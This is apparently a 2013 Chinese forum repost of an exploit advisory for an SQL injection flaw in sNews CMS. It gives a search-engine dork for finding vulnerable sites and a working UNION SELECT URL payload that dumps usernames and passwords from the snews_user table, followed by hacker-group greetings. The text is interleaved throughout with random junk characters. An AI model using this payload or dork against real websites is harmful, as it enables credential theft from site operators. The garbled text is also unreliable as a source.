标题: CMS snews SQL Injection Vulnerability1 D; _* C5 O- T
作者: By onestree" |: A9 x, \( x1 E
下载地址 : http://snewscms.com/* X' t+ M6 p3 y/ r; H3 K9 e0 K- R8 O
测试平台 : ubuntu 12.10 / win 7: e+ v' z, Q' u, I3 y+ K3 l) O
关键词: inurl:"tanyakan pada rumput yang bergoyang"
" ]' ^( U/ P/ u# Y
W6 }9 H5 D: v
' K1 o: H. s6 x0 B*************************************************************
0 D3 N2 X, D5 ^& z8 s3 S% F
: I* M6 n% \$ ~; J' aSQL poc:
6 T0 o9 C; q8 n5 F- d, |
+ |! e" ^$ a* ~' ghttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
$ Y) w% g- Q8 u$ y & S* s; ?; ~0 r+ X$ l* T
示例: I1 Q! C( c: b& N7 j. w0 ^# X
! @: c* B6 e" v7 V" v. [: b, @http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
3 F3 S7 S) o+ W8 M* A; ^1 ? / Z% m8 `; K/ S) ]# j* }
$ _* M, W/ b6 p, w9 g8 A. K' ? E# E' ~
致谢:
0 U9 {* _8 C' I; N3 R
: }8 l0 e$ q- R- W4 W9 {! i2 D; R Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell4 @, c: A: q; ^9 k4 r6 J3 L$ G* p
5 m: E! S" o9 e: F' ?. d# T% r2 P' A, d indonesiancoder - moeslimh4x0r - go-coder
D! K$ g. q8 n# ?; j) d
" W% j t! z% ]spesial my hunny :*
! `8 |$ ^4 [. X |
发表于 2013-1-23 08:55:06
收藏
分享
支持
反对